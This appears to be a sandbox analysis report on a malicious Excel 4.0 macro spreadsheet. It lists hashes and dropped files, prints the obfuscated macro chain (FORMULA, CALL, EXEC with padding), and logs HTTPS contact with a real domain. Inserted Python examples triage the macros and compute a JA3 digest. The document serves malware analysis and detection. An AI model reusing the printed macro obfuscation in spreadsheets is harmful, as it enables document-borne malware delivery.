                Size (bytes):59134
                Entropy (8bit):7.995450161616763
                Encrypted:true
                SSDEEP:1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
                MD5:E92176B0889CC1BB97114BEB2F3C1728
                SHA1:AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
                SHA-256:58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
                SHA-512:CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: MSCF............,...................I........T.........R.. .authroot.stl.ym&7.5..CK..8T....c_.d...:.(.....].M$[v.4.).E.$7*I.....e..Y..Rq...3.n..u..............|..=H....&..1.1..f.L..>e.6....F8.X.b.1$,.a...n-......D..a....[.....i,+.+..<.b._#...G..U.....n..21*pa..>.32..Y..j...;Ay........n/R... ._.+..<...Am.t.<. ..V..y`.yO..e@../...<#..#......dju*..B......8..H'..lr.....l.I6/..d.].xIX<...&U...GD..Mn.y&.[<(tk.....%B.b;./..`.#h....C.P...B..8d.F...D.k........... 0..w...@(.. @K....?.)ce........\.\......l......Q.Qd..+...@.X..##3..M.d..n6.....p1..)...x0V...ZK.{...{.=#h.v.).....b...*..[...L..*c..a..,...E5X..i.d..w.....#o*+.........X.P...k...V.$...X.r.e....9E.x..=\...Km.......B...Ep...xl@@c1.....p?...d.{EYN.K.X>D3..Z..q.] .Mq.........L.n}........+/l\.cDB0.'.Y...r.[.........vM...o.=....zK..r..l..>B....U..3....Z...ZjS...wZ.M...IW;..e.L...zC.wBtQ..&.Z.Fv+..G9.8..!..\T:K`......m.........9T.u..3h.....{...d[...@...Q.?..p.e.t[.%7..........^.....s.
                C:\Users\user\AppData\Local\Temp\TarE5B0.tmp
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):152788
                Entropy (8bit):6.316654432555028
                Encrypted:false
                SSDEEP:1536:WIA6c7RbAh/E9nF2hspNuc8odv+1//FnzAYtYyjCQxSMnl3xlUwg:WAmfF3pNuc7v+ltjCQSMnnSx
                MD5:64FEDADE4387A8B92C120B21EC61E394
                SHA1:15A2673209A41CCA2BC3ADE90537FE676010A962
                SHA-256:BB899286BE1709A14630DC5ED80B588FDD872DB361678D3105B0ACE0D1EA6745
                SHA-512:655458CB108034E46BCE5C4A68977DCBF77E20F4985DC46F127ECBDE09D6364FE308F3D70295BA305667A027AD12C952B7A32391EFE4BD5400AF2F4D0D830875
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview: 0..T...*.H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........R19%..210115004237Z0...+......0..D.0..*.....`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Tue Feb 23 03:35:41 2021, atime=Tue Feb 23 03:35:41 2021, length=8192, window=hide
                Category:dropped
                Size (bytes):867
                Entropy (8bit):4.485120499512926
                Encrypted:false
                SSDEEP:12:85QZ3WHcLgXg/XAlCPCHaXtB8XzB/0kiX+WnicvbkGeObDtZ3YilMMEpxRljKtTg:85wGq/XTd6j4Ye3eCDv3qwrNru/
                MD5:5716FCBCF49473B7E0DA6C6C0C4532E7
                SHA1:2B40EB010C5F7323D577A1DA37964FD1D46BCF96
                SHA-256:4C386546A9B805DCB2585CEADA06D1E92587182E13F3D0599AC30C10E133FF40
                SHA-512:C2025D5B84DDF8D232FEDE497CF7706AD019C9B24604DA7F344BC7598D18E8CD4FB4556C2289E74C5A75891116A801026B4DE0E4566944364DFEDE17E565E3D4
                Malicious:false
                Reputation:low
                Preview: L..................F...........7G.....W.......W..... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....WRu$..Desktop.d......QK.XWRu$*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\899552\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......899552..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-550193913.LNK
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Tue Feb 23 03:35:41 2021, atime=Tue Feb 23 03:35:41 2021, length=93184, window=hide
                Category:dropped
                Size (bytes):2108
                Entropy (8bit):4.528033883396002
                Encrypted:false
                SSDEEP:48:8Za/XT0jqOAjMCsSwQh2Za/XT0jqOAjMCsSwQ/:8Za/XojqOABwQh2Za/XojqOABwQ/
                MD5:63FCE306E198EA4256E660312C9938A2
                SHA1:ED457BEBEE3B0300C50E372D914024B3B814D9B9
                SHA-256:2786F3CC08E726B768C679676BA391D2C3FEC85315D271B8FA71108EDA611041
                SHA-512:49DCE70DEA6A90A1A083DD4BA7566043E32D62059FACDBE1EB8F43F8C997E6380F516F871C6649B631F7A16CE37D6F528CF28D0F9AA5A5540A81D67EB225EB01
                Malicious:false
                Reputation:low
                Preview: L..................F.... ....(...{.....W....cO.W.....l...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2..n..WRr$ .DOCUME~1.XLS..Z.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.5.5.0.1.9.3.9.1.3...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\899552\Users.user\Desktop\document-550193913.xls.-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.5.5.0.1.9.3.9.1.3...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......899552..........D_....3N...W..
                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):107
                Entropy (8bit):4.704136640648724
                Encrypted:false
                SSDEEP:3:oyBVomMY9LRzcWl2ulZELRzcWl2ulmMY9LRzcWl2ulv:dj6Y9LVl1ELVlPY9LVlL
                MD5:59D6E0A6C21A61366968A28C51B556C3
                SHA1:49C4F33DF0D414B6C8B50FE89D9AA393E44F207D
                SHA-256:540F24527642B86B694E23E030BA76E54DDE40B7862F356D9E284A6A232FC0A2
                SHA-512:A1DF2037139ABADB3EF4067A28C9E7272BA61224F2A8589D440586B7B945EB5BBAF2D9DF3DB53611B373AF0DD9BA6020DF865F0FBE7CD9C8D94988F13E202293
                Malicious:false
                Preview: Desktop.LNK=0..[xls]..document-550193913.LNK=0..document-550193913.LNK=0..[xls]..document-550193913.LNK=0..
                C:\Users\user\Desktop\ACDE0000
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Applesoft BASIC program data, first line number 16 (libmagic misidentification: the preview shows the same BIFF8 workbook header as the Workbook stream in the Static OLE Info below, so this is an Excel binary workbook image, not BASIC code)
                Category:dropped
                Size (bytes):143400
                Entropy (8bit):4.4844677313630505
                Encrypted:false
                SSDEEP:3072:oJxEtjPOtioVjDGUU1qfDlaGGx+cL2QnAFV1XU8mJxEtjPOtioVjDGUU1qfDlaGh:ixEtjPOtioVjDGUU1qfDlavx+W2QnAFi
                MD5:3BFBAD31205430D69DB51B2F5130C358
                SHA1:07777FAAFE7F2071CA21026BD1C563A2E538DA87
                SHA-256:03B7624902D8B7BFCBFB1D4E1743A710D325169DDB263D3C03A6EF8795DE861C
                SHA-512:768FBB51D44CA2975199171CA673B3480722E0613399C58B3FDD76FEDB41862EC16D725F2C40FC03E388F4A19EDB036D32A09C96955505B615BFFDCF60CBB3BD
                Malicious:false
                Preview: ........g2.........................\.p.... B.....a.........=...............................................=.....i..9J.8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1.......<...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...........

                Static File Info

                General

                File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1251, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Feb 22 11:59:11 2021, Security: 0
                Entropy (8bit):3.4738983608957428
                TrID:
                • Microsoft Excel sheet (30009/1) 78.94%
                • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                File name:document-550193913.xls
                File size:93696
                MD5:4107cd071635b4cc3689f77c688f57c3
                SHA1:cf6dea64431b614757906f32d3d1f016b5afdbb5
                SHA256:d49b40d468269f57fb87ea6ad7fd8bb303fbeb033dbd45fb4967c34c5dfbc2ed
                SHA512:ae568d93ef0c9cea430e18bdf5a27cb5e71fe2e13cfca9c508f196aead42d7a1e68dd863587a0549391b7c08af85de9e6db574c9d819422482ed6529df52c0fb
                SSDEEP:1536:ca7uDphYHceXVhca+fMHLtyeGxcl8O9pTINXUOmRwb05SXw1OTsRKvoNGrEJq7TT:ca7uDphYHceXVhca+fMHLtyeGxcl8O9m
                File Content Preview:........................>......................................................................................................................................................................................................................................

                File Icon

                Icon Hash:e4eea286a4b4bcb4

                Static OLE Info

                General

                Document Type:OLE
                Number of OLE Files:1

                OLE File "document-550193913.xls"

                Indicators

                Has Summary Info:True
                Application Name:Microsoft Excel
                Encrypted Document:False
                Contains Word Document Stream:False
                Contains Workbook/Book Stream:True
                Contains PowerPoint Document Stream:False
                Contains Visio Document Stream:False
                Contains ObjectPool Stream:
                Flash Objects Count:
                Contains VBA Macros:True

                Summary

                Code Page:1251
                Author:
                Last Saved By:
                Create Time:2006-09-16 00:00:00
                Last Saved Time:2021-02-22 11:59:11
                Creating Application:Microsoft Excel
                Security:0

                Document Summary

                Document Code Page:1251
                Thumbnail Scaling Desired:False
                Contains Dirty Links:False
                Shared Document:False
                Changed Hyperlinks:False
                Application Version:917504

                Streams

                Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                General
                Stream Path:\x5DocumentSummaryInformation
                File Type:data
                Stream Size:4096
                Entropy:0.337819969156
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . D o c u S i g n . . . . . D o c 2 . . . . . D o c 3 . . . . . D o c 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a8 00 00 00 02 00 00 00 e3 04 00 00
                Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                General
                Stream Path:\x5SummaryInformation
                File Type:data
                Stream Size:4096
                Entropy:0.250492291218
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 83101
                General
                Stream Path:Workbook
                File Type:Applesoft BASIC program data, first line number 16 (libmagic misidentification: the stream opens with the BIFF8 BOF record 09 08 10 00 shown in Data Raw below, i.e. this is the Excel binary workbook stream)
                Stream Size:83101
                Entropy:3.68114146554
                Base64 Encoded:True
                Data ASCII:. . . . . . . . g 2 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . i . . 9 J . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . .
                Data Raw:09 08 10 00 00 06 05 00 67 32 cd 07 c9 80 01 00 06 06 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                Macro 4.0 Code

                Non-empty cells of the macro sheet, in the order the report lists them, with the CSV export's doubled quotes undone (four consecutive quote characters in the export stand for the empty-string literal ""):
                • =""&""&""&""&""&""&""&""&""&""&""&""&FORMULA(Doc2!AS110&Doc2!AS111&"2 ",AD15)
                • =""&""&""&""&""&""&""&""&""&""&""&""&FORMULA(Doc2!AT110,AE15)
                • =FORMULA(Doc2!AV105&Doc2!AV107&Doc2!AV109,AF15)
                • =AE14()
                • =before.2.6.28.sheet!AD19()
                • =AJ19()
                • =before.2.6.28.sheet!AF20()
                • =REPLACE(Doc2!AP102&Doc2!AQ102,6,1,before.2.6.28.sheet!AE19)
                • =REPLACE(Doc2!AT94,6,1,Doc2!AT95)
                • =CALL(AF15,before.2.6.28.sheet!AD21&before.2.6.28.sheet!AD20&before.2.6.28.sheet!AD19&"A","JJC"&"CBB",0,Doc3!A100,""&""&""&""&""&""&""&""&""&""&""&""&""&""&""&Doc2!AT99,0)
                • =REPLACE(Doc2!AP103,7,7,Doc2!AP101&Doc2!AQ101)
                • =""&""&""&""&""&""&""&""&""&""&""&""&EXEC(before.2.6.28.sheet!AD15&Doc2!AT99&before.2.6.28.sheet!AE15&AJ19)
                • =AL19()
                • =AF17()
                • =REPLACE(Doc2!AP104&Doc2!AQ104&Doc2!AR104,7,7,"")
                • =HALT()
                • =before.2.6.28.sheet!AF14()
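                Added example (not part of the sandbox report or of the sample): a Python triage pass over the formulas listed above. It strips the ""& padding that keeps FORMULA, CALL and EXEC out of naive string signatures, records which cells call CALL, EXEC, FORMULA, REPLACE or HALT, and collects the sheets (Doc2, Doc3, before.2.6.28.sheet) whose cells hold the real strings, which is where an analyst would resolve the CALL and EXEC arguments next. The cell list is transcribed from the row above; the regular expressions and the function list are this example's own, not the sandbox's.

```python
import re

# Constructed input: the non-empty cells of the report's "Macro 4.0 Code" row, in the order
# listed, with the CSV export's doubled quotes undone ("""" -> "", ""2 "" -> "2 ").
MACRO_CELLS = [
    "=" + '""&' * 12 + 'FORMULA(Doc2!AS110&Doc2!AS111&"2 ",AD15)',
    "=" + '""&' * 12 + "FORMULA(Doc2!AT110,AE15)",
    "=FORMULA(Doc2!AV105&Doc2!AV107&Doc2!AV109,AF15)",
    "=AE14()",
    "=before.2.6.28.sheet!AD19()",
    "=AJ19()",
    "=before.2.6.28.sheet!AF20()",
    "=REPLACE(Doc2!AP102&Doc2!AQ102,6,1,before.2.6.28.sheet!AE19)",
    "=REPLACE(Doc2!AT94,6,1,Doc2!AT95)",
    ('=CALL(AF15,before.2.6.28.sheet!AD21&before.2.6.28.sheet!AD20&before.2.6.28.sheet!AD19&"A",'
     + '"JJC"&"CBB",0,Doc3!A100,' + '""&' * 15 + "Doc2!AT99,0)"),
    "=REPLACE(Doc2!AP103,7,7,Doc2!AP101&Doc2!AQ101)",
    "=" + '""&' * 12 + "EXEC(before.2.6.28.sheet!AD15&Doc2!AT99&before.2.6.28.sheet!AE15&AJ19)",
    "=AL19()",
    "=AF17()",
    '=REPLACE(Doc2!AP104&Doc2!AQ104&Doc2!AR104,7,7,"")',
    "=HALT()",
    "=before.2.6.28.sheet!AF14()",
]

# Excel 4.0 functions worth flagging, with the reason a reviewer cares about each one.
SUSPICIOUS = {
    "CALL": "calls an export of a DLL named at run time (download and process-launch APIs are reached this way)",
    "EXEC": "launches an external program",
    "REGISTER": "binds a DLL export to a name so it can be called later",
    "FORMULA": "writes into another cell at run time, i.e. the sheet rewrites itself",
    "REPLACE": "edits a string at run time; used to assemble arguments piecewise",
    "HALT": "ends the macro; harmless alone but marks where the payload chain stops",
}

PADDING = re.compile(r'(?:""&)+')                              # empty-string concatenation, pure padding
FUNC_CALL = re.compile(r"(?<![A-Za-z0-9_.!])([A-Z][A-Z0-9.]*)\(")  # NAME( not preceded by a sheet or cell ref
CELL_REF = re.compile(r"([A-Za-z0-9_.]+)!\$?[A-Z]{1,3}\$?[0-9]+")  # Sheet!A1 style references


def strip_padding(formula):
    """Drop ""& runs: they do nothing at run time but defeat naive string signatures."""
    return PADDING.sub("", formula)


def suspicious_functions(formula):
    """Set of flagged Excel 4.0 functions called in one formula."""
    return {f for f in FUNC_CALL.findall(strip_padding(formula)) if f in SUSPICIOUS}


def referenced_sheets(cells):
    """Sheets that must be read to resolve the arguments (the real strings live there)."""
    sheets = set()
    for formula in cells:
        sheets.update(CELL_REF.findall(formula))
    return sheets


def triage(cells):
    """One finding per cell that calls a flagged function, with the cleaned formula."""
    findings = []
    for index, raw in enumerate(cells):
        funcs = suspicious_functions(raw)
        if funcs:
            findings.append({
                "cell": index,
                "formula": strip_padding(raw),
                "functions": sorted(funcs),
                "reasons": [SUSPICIOUS[f] for f in sorted(funcs)],
            })
    return findings


def is_malicious_pattern(cells):
    """True when the sheet both rewrites itself (FORMULA/REPLACE) and reaches outside Excel (CALL/EXEC/REGISTER)."""
    called = set()
    for formula in cells:
        called |= suspicious_functions(formula)
    return bool(called & {"FORMULA", "REPLACE"}) and bool(called & {"CALL", "EXEC", "REGISTER"})


if __name__ == "__main__":
    for finding in triage(MACRO_CELLS):
        print(f"cell {finding['cell']:2d}: {', '.join(finding['functions']):8s} {finding['formula']}")
    print("sheets to resolve:", ", ".join(sorted(referenced_sheets(MACRO_CELLS))))
    print("self-modifying and reaches outside Excel:", is_malicious_pattern(MACRO_CELLS))
```

                The cleaned CALL and EXEC lines show that every meaningful argument (the DLL, the export, the command line) is read from Doc2, Doc3 and the sheet named before.2.6.28.sheet, so static review has to dump those sheets' cells as well; the macro sheet alone only reveals the shape of the chain (FORMULA and REPLACE to build strings, CALL to fetch, EXEC to run, HALT to stop).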

                Network Behavior

                Network Port Distribution

                TCP Packets

                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Feb 22, 2021 20:36:20.178004026 CET | 49165 | 443 | 192.168.2.22 | 208.91.199.118
                Feb 22, 2021 20:36:20.354383945 CET | 443 | 49165 | 208.91.199.118 | 192.168.2.22
                Feb 22, 2021 20:36:20.354538918 CET | 49165 | 443 | 192.168.2.22 | 208.91.199.118
                Feb 22, 2021 20:36:20.377919912 CET | 49165 | 443 | 192.168.2.22 | 208.91.199.118
                Feb 22, 2021 20:36:20.552006006 CET | 443 | 49165 | 208.91.199.118 | 192.168.2.22
                Feb 22, 2021 20:36:20.559294939 CET | 443 | 49165 | 208.91.199.118 | 192.168.2.22
                Feb 22, 2021 20:36:20.559331894 CET | 443 | 49165 | 208.91.199.118 | 192.168.2.22
                Feb 22, 2021 20:36:20.559365988 CET | 443 | 49165 | 208.91.199.118 | 192.168.2.22
                Feb 22, 2021 20:36:20.559446096 CET | 49165 | 443 | 192.168.2.22 | 208.91.199.118
                Feb 22, 2021 20:36:20.559478998 CET | 49165 | 443 | 192.168.2.22 | 208.91.199.118
                Feb 22, 2021 20:36:20.597441912 CET | 49165 | 443 | 192.168.2.22 | 208.91.199.118
                Feb 22, 2021 20:36:20.768651009 CET | 443 | 49165 | 208.91.199.118 | 192.168.2.22
                Feb 22, 2021 20:36:20.768876076 CET | 49165 | 443 | 192.168.2.22 | 208.91.199.118
                Feb 22, 2021 20:36:22.337011099 CET | 49165 | 443 | 192.168.2.22 | 208.91.199.118
                Feb 22, 2021 20:36:22.552406073 CET | 443 | 49165 | 208.91.199.118 | 192.168.2.22
                Feb 22, 2021 20:36:22.809874058 CET | 443 | 49165 | 208.91.199.118 | 192.168.2.22
                Feb 22, 2021 20:36:22.809968948 CET | 443 | 49165 | 208.91.199.118 | 192.168.2.22
                Feb 22, 2021 20:36:22.810028076 CET | 49165 | 443 | 192.168.2.22 | 208.91.199.118
                Feb 22, 2021 20:36:22.810611963 CET | 49165 | 443 | 192.168.2.22 | 208.91.199.118
                Feb 22, 2021 20:36:22.810627937 CET | 49165 | 443 | 192.168.2.22 | 208.91.199.118
                Feb 22, 2021 20:36:22.976635933 CET | 443 | 49165 | 208.91.199.118 | 192.168.2.22

                UDP Packets

                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                Feb 22, 2021 20:36:20.104002953 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
                Feb 22, 2021 20:36:20.164762974 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
                Feb 22, 2021 20:36:21.079830885 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
                Feb 22, 2021 20:36:21.139955044 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
                Feb 22, 2021 20:36:21.163115978 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
                Feb 22, 2021 20:36:21.212127924 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
                Feb 22, 2021 20:36:21.754522085 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
                Feb 22, 2021 20:36:21.815949917 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22
                Feb 22, 2021 20:36:21.829842091 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8
                Feb 22, 2021 20:36:21.896408081 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22

                DNS Queries

                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                Feb 22, 2021 20:36:20.104002953 CET | 192.168.2.22 | 8.8.8.8 | 0xb648 | Standard query (0) | helendunnosteopathy.co.uk | A (IP address) | IN (0x0001)

                DNS Answers

                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                Feb 22, 2021 20:36:20.164762974 CET | 8.8.8.8 | 192.168.2.22 | 0xb648 | No error (0) | helendunnosteopathy.co.uk | | 208.91.199.118 | A (IP address) | IN (0x0001)

                HTTPS Packets

                Timestamp | Source IP | Source Port | Dest IP | Dest Port | JA3 SSL Client Fingerprint | JA3 SSL Client Digest
                Feb 22, 2021 20:36:20.559365988 CET | 208.91.199.118 | 443 | 192.168.2.22 | 49165 | 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0 | 7dcce5b76c8b17472d024758970a406b

                Certificate chain presented by the server (Subject | Issuer | Not Before | Not After):
                CN=cpcalendars.helendunnosteopathy.co.uk | CN=R3, O=Let's Encrypt, C=US | Sat Jan 30 12:12:51 CET 2021 | Fri Apr 30 13:12:51 CEST 2021
                CN=R3, O=Let's Encrypt, C=US | CN=DST Root CA X3, O=Digital Signature Trust Co. | Wed Oct 07 21:21:40 CEST 2020 | Wed Sep 29 21:21:40 CEST 2021
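                Added example (not from the report): how the JA3 digest in the table above is derived, so the value can be reproduced from a packet capture rather than taken on trust. The code builds a minimal TLS ClientHello from the printed JA3 fields (a constructed message; the report does not contain the real handshake bytes, and the zeroed random, empty session id and the SNI value are assumptions of the example), parses it back into the five-field JA3 string with RFC 8701 GREASE values removed, and hashes that string with MD5. Two caveats a reader of this table should keep in mind: JA3 describes the TLS client stack of the process that opened the connection, so a digest that has been "seen with other malware" usually means the same Windows TLS stack and is weak evidence on its own; and the CryptnetUrlCache, CabE5AF.tmp and TarE5B0.tmp entries in the dropped-file list above (authrootstl.cab, dstrootcax3.p7c) are the side effect of Windows validating this Let's Encrypt chain up to DST Root CA X3, not files written by the macro.

```python
import hashlib

# JA3 fields exactly as the report prints them for the 192.168.2.22 -> 208.91.199.118:443 session.
REPORT_JA3 = ("771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-"
              "49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0")
REPORT_DIGEST = "7dcce5b76c8b17472d024758970a406b"

# RFC 8701 GREASE values (0x0a0a, 0x1a1a, ... 0xfafa); JA3 drops them so a randomising
# client keeps a stable fingerprint.
GREASE = {(x << 8) | x for x in range(0x0A, 0x100, 0x10)}


def _split(field):
    return [int(v) for v in field.split("-")] if field else []


def build_client_hello(ja3, sni="example.invalid", grease=False):
    """Serialise a minimal ClientHello handshake message carrying the given JA3 fields.
    Constructed purely so the parser has input: random and session id are zeroed and the
    extension bodies that JA3 ignores (13, 23) are left empty."""
    version, ciphers, exts, groups, formats = ja3.split(",")
    ciphers, exts, groups, formats = map(_split, (ciphers, exts, groups, formats))
    if grease:                      # what a Chrome-style client would inject
        ciphers = [0x0A0A] + ciphers
        exts = [0x1A1A] + exts
        groups = [0x2A2A] + groups
    ext_blob = b""
    for etype in exts:
        if etype == 0:              # server_name: list length, name type 0, name length, name
            name = sni.encode()
            data = (len(name) + 3).to_bytes(2, "big") + b"\x00" + len(name).to_bytes(2, "big") + name
        elif etype == 10:           # supported_groups: list length + 2-byte group ids
            data = (2 * len(groups)).to_bytes(2, "big") + b"".join(g.to_bytes(2, "big") for g in groups)
        elif etype == 11:           # ec_point_formats: 1-byte length + 1-byte formats
            data = bytes([len(formats)]) + bytes(formats)
        elif etype == 65281:        # renegotiation_info: empty renegotiated_connection
            data = b"\x00"
        else:                       # contents irrelevant to JA3
            data = b""
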